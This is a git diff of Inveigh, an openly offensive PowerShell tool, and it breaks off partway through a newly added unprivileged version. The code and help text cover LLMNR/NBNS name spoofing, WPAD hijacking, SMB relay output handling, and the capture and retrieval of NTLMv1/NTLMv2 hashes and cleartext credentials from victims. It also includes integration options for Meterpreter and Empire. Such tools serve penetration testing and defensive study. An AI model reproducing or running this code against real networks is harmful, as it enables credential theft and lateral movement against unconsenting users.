$HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes + $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes + $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes + $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes + $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes + $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes + $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes if($HTTP_NTLM_length -eq 24) # NTLMv1 { @@ -1406,7 +1463,7 @@ $control_relay_scriptblock = if($RunTime) { - $control_timeout = New-Timespan -Minutes $RunTime + $control_timeout = New-TimeSpan -Minutes $RunTime $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() } @@ -1467,31 +1524,31 @@ $control_relay_scriptblock = } - if($inveigh.file_output -and (!$inveigh.running -or !$inveigh.bruteforce_running)) + if($inveigh.file_output -and $inveigh.relay_file_output) { while($inveigh.log_file_queue.Count -gt 0) { $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append - $inveigh.log_file_queue.RemoveRange(0,1) + $inveigh.log_file_queue.RemoveAt(0) } while($inveigh.NTLMv1_file_queue.Count -gt 0) { $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append - $inveigh.NTLMv1_file_queue.RemoveRange(0,1) + $inveigh.NTLMv1_file_queue.RemoveAt(0) } while($inveigh.NTLMv2_file_queue.Count -gt 0) { $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append - $inveigh.NTLMv2_file_queue.RemoveRange(0,1) + $inveigh.NTLMv2_file_queue.RemoveAt(0) } while($inveigh.cleartext_file_queue.Count -gt 0) { $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append - $inveigh.cleartext_file_queue.RemoveRange(0,1) + $inveigh.cleartext_file_queue.RemoveAt(0) } } @@ -1528,7 +1585,7 @@ function HTTPListener() $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument( + $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument( $SMBRelayTarget).AddArgument($SMBRelayCommand).AddArgument($SMBRelayUsernames).AddArgument( $SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument($WPADAuth) > $null $HTTP_powershell.BeginInvoke() > $null @@ -1559,7 +1616,7 @@ if($RunTime -or $inveigh.file_output) ControlRelayLoop } -if(!$inveigh.running -and $inveigh.console_output) +if($inveigh.console_output) { :console_loop while($inveigh.relay_running -and $inveigh.console_output) @@ -1571,7 +1628,7 @@ if(!$inveigh.running -and $inveigh.console_output) if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } else { @@ -1579,12 +1636,6 @@ if(!$inveigh.running -and $inveigh.console_output) switch -wildcard ($inveigh.console_queue[0]) { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - "* written to *" { @@ -1593,31 +1644,31 @@ if(!$inveigh.running -and $inveigh.console_output) Write-Warning $inveigh.console_queue[0] } - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } } @@ -1647,114 +1698,163 @@ if(!$inveigh.running -and $inveigh.console_output) function Stop-Inveigh { - <# - .SYNOPSIS - Stop-Inveigh will stop all running Inveigh functions. - #> +<# +.SYNOPSIS +Stop-Inveigh will stop all running Inveigh functions. +#> + +if($inveigh) +{ - if($inveigh) + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) { - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) + + if($inveigh.HTTP_listener.IsListening) { + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() + } + + if($inveigh.unprivileged_running) + { + $inveigh.unprivileged_running = $false + Start-Sleep -s 5 + Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null - if($inveigh.HTTP_listener.IsListening) + if($inveigh.file_output) { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() + "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append } - - if($inveigh.bruteforce_running) - { - $inveigh.bruteforce_running = $false - Write-Output("$(Get-Date -format 's') - Attempting to stop HTTP listener") - $inveigh.HTTP_listener.server.blocking = $false - Start-Sleep -s 1 - $inveigh.HTTP_listener.server.Close() - Start-Sleep -s 1 - $inveigh.HTTP_listener.Stop() - Write-Output("Inveigh Brute Force exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Brute Force exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Brute Force exited" | Out-File $Inveigh.log_out_file -Append - } - } + } - if($inveigh.relay_running) + if($inveigh.relay_running) + { + $inveigh.relay_running = $false + Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + + if($inveigh.file_output) { - $inveigh.relay_running = $false - Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append + } - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append - } + } - } + if($inveigh.running) + { + $inveigh.running = $false + Write-Output("Inveigh exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null - if($inveigh.running) + if($inveigh.file_output) { - $inveigh.running = $false - Write-Output("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null + "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append + } - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append - } + } - } + } + else + { + Write-Output("There are no running Inveigh functions") + } + + if($inveigh.HTTPS) + { + & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null - } - else + try { - Write-Output("There are no running Inveigh functions") + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] + $certificate_store.Remove($certificate) + $certificate_store.Close() } - - if($inveigh.HTTPS) + catch { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null + Write-Output("SSL Certificate Deletion Error - Remove Manually") + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - try + if($inveigh.file_output) { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() + "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append } - catch - { - Write-Output("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - if($inveigh.file_output) - { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append - } - - } } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false - } - else - { - Write-Output("There are no running Inveigh functions")|Out-Null } + $inveigh.HTTP = $false + $inveigh.HTTPS = $false +} +else +{ + Write-Output("There are no running Inveigh functions")|Out-Null +} + } function Get-Inveigh { - <# - .SYNOPSIS - Get-Inveigh will display queued Inveigh console output. - #> +<# +.SYNOPSIS +Get-Inveigh will get stored Inveigh data from memory. + +.PARAMETER Console +Get queued console output. This is also the default if no parameters are set. + +.PARAMETER Log +Get log entries. + +.PARAMETER NTLMv1 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv1Unique +Get the first captured NTLMv1 challenge/response for each unique account. + +.PARAMETER NTLMv1Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER NTLMv2 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv2Unique +Get the first captured NTLMv2 challenge/response for each unique account. + +.PARAMETER NTLMv2Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER Cleartext +Get captured cleartext credentials. + +.PARAMETER CleartextUnique +Get unique captured cleartext credentials. + +.PARAMETER Learning +Get valid hosts discovered through spoofer learning. +#> + +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][Switch]$Console, + [parameter(Mandatory=$false)][Switch]$Log, + [parameter(Mandatory=$false)][Switch]$NTLMv1, + [parameter(Mandatory=$false)][Switch]$NTLMv2, + [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, + [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, + [parameter(Mandatory=$false)][Switch]$Cleartext, + [parameter(Mandatory=$false)][Switch]$CleartextUnique, + [parameter(Mandatory=$false)][Switch]$Learning, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if($Console -or $PSBoundParameters.Count -eq 0) +{ while($inveigh.console_queue.Count -gt 0) { @@ -1762,7 +1862,7 @@ function Get-Inveigh if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } else { @@ -1770,12 +1870,6 @@ function Get-Inveigh switch -wildcard ($inveigh.console_queue[0]) { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - "* written to *" { @@ -1784,31 +1878,31 @@ function Get-Inveigh Write-Warning $inveigh.console_queue[0] } - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } } @@ -1819,279 +1913,200 @@ function Get-Inveigh } -function Get-InveighCleartext +if($Log) { - <# - .SYNOPSIS - Get-InveighCleartext will get all captured cleartext credentials. - - .PARAMETER Unique - Display only unique cleartext credentials. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter - ) - - if($Unique) - { - Write-Output $inveigh.cleartext_list | Get-Unique - } - else - { - Write-Output $inveigh.cleartext_list - } - + Write-Output $inveigh.log } -function Get-InveighNTLMv1 +if($NTLMv1) { - <# - .SYNOPSIS - Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. - - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) - - if ($invalid_parameter) - { - throw "$($invalid_parameter) is not a valid parameter." - } + Write-Output $inveigh.NTLMv1_list +} - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } +if($NTLMv1Unique) +{ + $inveigh.NTLMv1_list.Sort() - if($Unique) + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) { - $inveigh.NTLMv1_list.Sort() + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) - { - Write-Output $unique_NTLMv1 - } - - $unique_NTLMv1_account_last = $unique_NTLMv1_account + Write-Output $unique_NTLMv1 } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv1_username_list - } - else - { - Write-Output $inveigh.NTLMv1_list + + $unique_NTLMv1_account_last = $unique_NTLMv1_account } } -function Get-InveighNTLMv2 +if($NTLMv1Usernames) { - <# - .SYNOPSIS - Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. + Write-Output $inveigh.NTLMv2_username_list +} - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> +if($NTLMv2) +{ + Write-Output $inveigh.NTLMv2_list +} - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) +if($NTLMv2Unique) +{ + $inveigh.NTLMv2_list.Sort() - if($invalid_parameter) + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) { - throw "$($invalid_parameter) is not a valid parameter." - } + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output $unique_NTLMv2 + } - if($Unique) - { - $inveigh.NTLMv2_list.Sort() + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) - { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) +} - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) - { - Write-Output $unique_NTLMv2 - } +if($NTLMv2Usernames) +{ + Write-Output $inveigh.NTLMv2_username_list +} - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv2_username_list - } - else - { - Write-Output $inveigh.NTLMv2_list - } +if($Cleartext) +{ + Write-Output $inveigh.cleartext_list +} +if($CleartextUnique) +{ + Write-Output $inveigh.cleartext_list | Get-Unique } -function Get-InveighLog +if($Learning) { - <# - .SYNOPSIS - Get-InveighLog will get log entries. - #> + Write-Output $inveigh.valid_host_list +} - Write-Output $inveigh.log } function Watch-Inveigh { - <# - .SYNOPSIS - Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. - #> +<# +.SYNOPSIS +Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. +#> + +if($inveigh.tool -ne 1) +{ - if($inveigh.tool -ne 1) + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) { + Write-Output "Press any key to stop real time console output" + $inveigh.console_output = $true - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) + :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) { - Write-Output "Press any key to stop real time console output" - $inveigh.console_output = $true - :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + while($inveigh.console_queue.Count -gt 0) { - while($inveigh.console_queue.Count -gt 0) + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else { - if($inveigh.output_stream_only) + switch -wildcard ($inveigh.console_queue[0]) { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } + "* written to *" + { - "* for relay *" + if($inveigh.file_output) { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) } - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + $inveigh.console_queue.RemoveAt(0) + } - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + "* for relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + "*SMB relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + "* local administrator *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) } } - - } - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop } + + } - Start-Sleep -m 5 + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop } - } - else - { - Write-Output "Inveigh isn't running" + Start-Sleep -m 5 } } else { - Write-Output "Watch-Inveigh cannot be used with current external tool selection" + Write-Output "Inveigh isn't running" } +} +else +{ + Write-Output "Watch-Inveigh cannot be used with current external tool selection" +} + } function Clear-Inveigh { - <# - .SYNOPSIS - Clear-Inveigh will clear Inveigh data from memory. - #> - - if($inveigh) - { +<# +.SYNOPSIS +Clear-Inveigh will clear Inveigh data from memory. +#> - if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.bruteforce_running) - { - Remove-Variable inveigh -scope global - Write-Output "Inveigh data has been cleared from memory" - } - else - { - Write-Output "Run Stop-Inveigh before running Clear-Inveigh" - } +if($inveigh) +{ + if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running) + { + Remove-Variable inveigh -scope global + Write-Output "Inveigh data has been cleared from memory" } + else + { + Write-Output "Run Stop-Inveigh before running Clear-Inveigh" + } + +} } \ No newline at end of file diff --git a/Scripts/Inveigh-Unprivileged.ps1 b/Scripts/Inveigh-Unprivileged.ps1 new file mode 100644 index 0000000..b4c0c25 --- /dev/null +++ b/Scripts/Inveigh-Unprivileged.ps1 @@ -0,0 +1,2364 @@ +function Invoke-InveighUnprivileged +{ +<# +.SYNOPSIS +Invoke-InveighUnprivileged is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP. This +version of Inveigh does not require local admin access. + +.DESCRIPTION +Invoke-InveighUnprivileged is a Windows PowerShell LLMNR/NBNS spoofer with the following features: + + Local admin is not required for any feature + IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service + IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled + Targeted IPv4 NBNS transaction ID brute force spoofer with granular control + NTLMv1/NTLMv2 challenge/response capture over HTTP + Basic auth cleartext credential capture over HTTP + WPAD server capable of hosting a basic or custom wpad.dat file + HTTP server capable of hosting limited content + Granular control of console and file output + Run time control + +This function contains only features that do not require local admin access. Note that there are caveats. A local +firewall can still prevent traffic from reaching this function's listeners. Also, if LLMNR is enabled on the host, +the LLMNR spoofer will not work. Both of these scenarios would still require local admin access to +change. + +.PARAMETER SpooferIP +IP address for the LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system +other than the Inveigh host. + +.PARAMETER SpooferHostsReply +Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferHostsIgnore +Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferIPsReply +Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferIPsIgnore +Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferRepeat +Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user +challenge/response has been captured. + +.PARAMETER LLMNR +Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer. + +.PARAMETER LLMNRTTL +Default = 30 Seconds: LLMNR TTL in seconds for the response packet. + +.PARAMETER NBNS +Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. + +.PARAMETER NBNSTTL +Default = 165 Seconds: NBNS TTL in seconds for the response packet. + +.PARAMETER NBNSBruteForce +Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. + +.PARAMETER NBNSBruteForceHost +Default = WPAD: Hostname for the NBNS Brute Force spoofer. + +.PARAMETER NBNSBruteForcePause +Default = Disabled: (Integer) Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming +HTTP request is received. + +.PARAMETER NBNSBruteForceTarget +IP address to target for NBNS brute force spoofing. + +.PARAMETER HTTP +Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. + +.PARAMETER HTTPIP +Default = Any: IP address for the HTTP listener. + +.PARAMETER HTTPPort +Default = 80: TCP port for the HTTP listener. + +.PARAMETER HTTPAuth +Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to +wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A +WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and +connecting to the root of the HTTP listener. + +.PARAMETER HTTPBasicRealm +Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. + +.PARAMETER HTTPResponse +String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. +Use PowerShell character escapes where necessary. + +.PARAMETER WPADAuth +Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to +Anonymous can prevent browser login prompts. + +.PARAMETER WPADEmptyFile +Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. +Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when +using WPADIP, WPADPort, or WPADResponse. + +.PARAMETER WPADIP +Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used +with WPADPort. + +.PARAMETER WPADPort +Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be +used with WPADIP. + +.PARAMETER WPADDirectHosts +Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the +defined proxy. Use PowerShell character escapes where necessary. + +.PARAMETER WPADResponse +wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort +are set. + +.PARAMETER Challenge +Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random +challenge will be generated for each request. This will only be used for non-relay captures. + +.PARAMETER MachineAccounts +Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. + +.PARAMETER ConsoleOutput +Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to +ensure that it doesn't hang the shell. + +.PARAMETER ConsoleStatus +(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for +displaying full capture lists when running through a shell that does not have access to the support functions. + +.PARAMETER ConsoleUnique +Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time console output is enabled. + +.PARAMETER FileOutput +Default = Disabled: (Y/N) Enable/Disable real time file output. + +.PARAMETER FileUnique +Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time file output is enabled. + +.PARAMETER StatusOutput +Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. + +.PARAMETER OutputStreamOnly +Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if +running Inveigh Unprivileged through a shell that does not return other output streams. Note that you will not see +the various yellow warning messages if enabled. + +.PARAMETER OutputDir +Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be +enabled. + +.PARAMETER RunTime +Default = Unlimited: (Integer) Run time duration in minutes. + +.PARAMETER RunCount +Default = Unlimited: (Integer) Number of captures to perform before auto-exiting. + +.PARAMETER ShowHelp +Default = Enabled: (Y/N) Enable/Disable the help messages at startup. + +.PARAMETER Tool +Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's +PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. +0 = None, 1 = Metasploit/Meterpreter, 2 = Empire + +.EXAMPLE +Import-Module .\Inveigh.psd1;Invoke-InveighUnprivileged -ConsoleOutput Y + +.EXAMPLE +Invoke-InveighUnprivileged -NBNSBruteForce Y -SpooferTarget 192.168.1.11 -Hostname server1 +Target 192.168.1.11 for 'server1' hostname spoofs. + +.EXAMPLE +Invoke-InveighUnprivileged -NBNSBruteForce Y -SpooferTarget 192.168.1.11 -WPADIP 192.168.10.10 -WPADPort 8080 +Target 192.168.1.11 for 'WPAD' hostname spoofs and respond to wpad.dat requests with a proxy of 192.168.10.10:8080. + +.LINK +https://github.com/Kevin-Robertson/Inveigh +#> + +# Parameter default values can be modified in this section: +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"), + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", + [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "", + [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "", + [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "", + [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "", + [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "", + [parameter(Mandatory=$false)][Int]$ConsoleStatus = "", + [parameter(Mandatory=$false)][Int]$HTTPPort = "80", + [parameter(Mandatory=$false)][Int]$NBNSBruteForcePause = "", + 